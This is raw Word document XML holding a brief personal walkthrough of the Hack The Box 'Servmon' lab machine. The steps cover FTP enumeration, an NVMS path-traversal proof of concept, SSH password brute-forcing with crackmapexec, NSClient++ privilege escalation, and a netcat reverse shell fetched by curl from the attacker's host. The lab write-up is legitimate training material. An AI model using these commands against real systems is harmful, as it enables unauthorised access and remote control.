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6FE76" w14:textId="069C8D08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 xml:space="preserve">HTB Machine: </w:t>
      </w:r>
      <w:r w:rsidR="00104B01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Servmon </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D04FF3" w14:textId="77777777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336EAB7" w14:textId="531C7167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1. Machine Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD73D3C" w14:textId="554A7E0F" w:rsidR="00843DCE" w:rsidRP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Short Summary:</w:t>
      </w:r>
      <w:r w:rsidR="00DD24D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> It’s a bit of hard machine where I obtain the knowledge of file tranfer via 3-4 connection</w:t>
      </w:r>
      <w:r w:rsidR="00B17812">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB22895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29B9A771" w14:textId="05376F36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2. Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52595731" w14:textId="0DDAB492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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap Scan Command:</w:t>
      </w:r>
      <w:r w:rsidR="00104B01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CF25E9" w14:textId="28D694BD" w:rsidR="009B0AA8" w:rsidRPr="00843DCE" w:rsidRDefault="009B0AA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sleep 300; nmap -p- ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52999D37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62E2A5C3" w14:textId="12689E9D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3. Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="22303D13" w:rsidR="00843DCE" w:rsidRDefault="0024653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ftp ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660DCB0" w14:textId="51B9F46F" w:rsidR="00246536" w:rsidRDefault="0024653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with anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630331A" w14:textId="08AA6BF1" w:rsidR="00246536" w:rsidRDefault="0024653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try to visit both txt file with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63A7D3" w14:textId="5834552E" w:rsidR="00246536" w:rsidRDefault="0024653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get xyz.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250683E" w14:textId="684E0378" w:rsidR="00246536" w:rsidRDefault="00246536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so we obtain them into our kal</w:t>
      </w:r>
      <w:r w:rsidR="00D13605">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">i. From kali cat it and we obtain some info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="03F4C383" w:rsidR="00843DCE" w:rsidRDefault="001D31F7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obtain that 1 file is available where password is there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61FCA9" w14:textId="684E6BA3" w:rsidR="001D31F7" w:rsidRDefault="00A4305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nvms so try it with serchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25353964" w14:textId="07865AB5" w:rsidR="00A4305F" w:rsidRDefault="00A4305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Searchsploit nvms -x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2414A9" w14:textId="2F37D2EE" w:rsidR="005F2DF4" w:rsidRDefault="005F2DF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Searchsploit -x zzz/47774.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CDD2FF" w14:textId="257355A5" w:rsidR="005F2DF4" w:rsidRDefault="0086485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Here we obtain the POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048D87E" w14:textId="77777777" w:rsidR="00864854" w:rsidRDefault="00864854" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E62A168" w14:textId="77777777" w:rsidR="00864854" w:rsidRDefault="00864854" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA03B5D" w14:textId="77777777" w:rsidR="001D31F7" w:rsidRDefault="001D31F7" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF7D628" w14:textId="6A3118F3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4. Code Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC1E3E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AAABFB4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</w:p>
    <w:p w14:paraId="78E5BB1E" w14:textId="5EE10C89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5. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="22DD1D6F" w:rsidR="00843DCE" w:rsidRDefault="00864854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Try with that POC we will obtain that file info</w:t>
      </w:r>
      <w:r w:rsidR="00B74232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BFD26" w14:textId="6E53A04F" w:rsidR="00B74232" w:rsidRDefault="00B7423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we know that there has a file named password.txt so try to visit it with POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C35C3D2" w14:textId="5598FA0E" w:rsidR="002138FF" w:rsidRDefault="00B74232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/Users/Nathan/Desktop/Passowrd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF4102" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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lastRenderedPageBreak/>
        <w:t>6. Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDC346" w14:textId="77777777" w:rsidR="002138FF" w:rsidRDefault="002138FF" w:rsidP="002138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passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F94C9D" w14:textId="77777777" w:rsidR="002138FF" w:rsidRDefault="002138FF" w:rsidP="002138FF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for bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="4ECD256F" w:rsidR="00843DCE" w:rsidRDefault="002138F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Crackmapexec ssh ip -u 1</w:t>
      </w:r>
      <w:r w:rsidRPr="002138FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_user -p password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F0638" w14:textId="21D13F2D" w:rsidR="002138FF" w:rsidRDefault="002138F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Crackmapexec ssh ip -u 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_user -p password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BFCA12" w14:textId="4FE9E0EC" w:rsidR="002138FF" w:rsidRDefault="002138FF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And we obtain perfect password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D183294" w14:textId="77777777" w:rsidR="00BD073D" w:rsidRDefault="00BD073D" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7367FE24" w14:textId="4A3FC9B5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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECCD9B" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00A7103A" w:rsidP="00A7103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Ssh Nadine@ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6178AA92" w14:textId="6FD23FF7" w:rsidR="00A7103A" w:rsidRDefault="00A7103A" w:rsidP="00A7103A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we obtain user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751C7B8" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91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</w:p>
    <w:p w14:paraId="27CC4E7C" w14:textId="64E599FF" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00843DCE" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843DCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8. Root Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FDEA32" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91" w:rsidP="00490B9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Cd nsclient++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E6997" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91" w:rsidP="00490B9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Type nsclient.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF58F36" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91" w:rsidP="00490B9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We obtain another password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6083DDC9" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91" w:rsidP="00490B9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Ssh -L 8443:127.0.0.1:8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE059B0" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91" w:rsidP="00490B9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Now visit it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD7D77" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91" w:rsidP="00490B9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 xml:space="preserve">Searchsploit nsclient </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662337D6" w14:textId="77777777" w:rsidR="00490B91" w:rsidRDefault="00490B91" w:rsidP="00490B91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Searchsploit -x paste path for txt what we obtain for previlage exsclations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E805258" w14:textId="063C08E7" w:rsidR="00843DCE" w:rsidRDefault="00F30655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Go to the Script -&gt; Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411CFF1" w14:textId="77777777" w:rsidR="00610A01" w:rsidRDefault="00610A01" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AF8664" w14:textId="0F1D689C" w:rsidR="00B64C58" w:rsidRDefault="00B64C5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Python3 -m http.server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8F1FF" w14:textId="4F509760" w:rsidR="00610A01" w:rsidRDefault="00610A01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Locate nc.exe = obtain the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA3F96" w14:textId="31D8C157" w:rsidR="00B64C58" w:rsidRDefault="00B64C5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Cp path /www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701572ED" w14:textId="672B0649" w:rsidR="00B64C58" w:rsidRDefault="00B64C5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In shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C044FA9" w14:textId="3699374A" w:rsidR="00B64C58" w:rsidRDefault="00B64C58" w:rsidP="00843DCE">
      <w:pPr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>Curl our-ip:8000/nc.exe -o nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D8C61" w14:textId="52F6B442" w:rsidR="00A311DF" w:rsidRDefault="00CE253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Nc -lvnp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D9201" w14:textId="0F3E8C55" w:rsidR="00404AED" w:rsidRDefault="00404A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In shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E8F6CF" w14:textId="5D54FD7A" w:rsidR="00404AED" w:rsidRDefault="00404AED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Nc.exe -e cmd our_ip</w:t>
      </w:r>
      <w:r w:rsidR="000955B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DACF8AB" w14:textId="6EF7524A" w:rsidR="000955B7" w:rsidRPr="00843DCE" w:rsidRDefault="000955B7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And we obtain shell</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000955B7" w:rsidRPr="00843D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AFB"/>
    <w:rsid w:val="000955B7"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00104B01"/>
    <w:rsid w:val="001D31F7"/>
    <w:rsid w:val="002138FF"/>
    <w:rsid w:val="00246536"/>
    <w:rsid w:val="00346F72"/>
    <w:rsid w:val="00404AED"/>
    <w:rsid w:val="004277F6"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00490B91"/>
    <w:rsid w:val="005920E2"/>
    <w:rsid w:val="005F2DF4"/>
    <w:rsid w:val="00610A01"/>
    <w:rsid w:val="0079115C"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00864854"/>
    <w:rsid w:val="00871C8A"/>
    <w:rsid w:val="008926C6"/>
    <w:rsid w:val="009B0AA8"/>
    <w:rsid w:val="00A02DF8"/>
    <w:rsid w:val="00A12A51"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A4305F"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A7103A"/>
    <w:rsid w:val="00B17812"/>
    <w:rsid w:val="00B64C58"/>
    <w:rsid w:val="00B74232"/>
    <w:rsid w:val="00BD073D"/>
    <w:rsid w:val="00C565D5"/>
    <w:rsid w:val="00CE2532"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CE75CE"/>
    <w:rsid w:val="00D13605"/>
    <w:rsid w:val="00D22826"/>
    <w:rsid w:val="00DD24D6"/>
    <w:rsid w:val="00E55B42"/>
    <w:rsid w:val="00F30655"/>
    <w:rsid w:val="00F57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D596D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E03A3A5B-E9F2-43CE-B86B-8D51C3210D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103A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6AF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6AF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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6AF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6A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6AF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6AF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2</Pages>
  <Words>215</Words>
  <Characters>1228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Bhavya Manvar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhavya Manvar</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T16:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>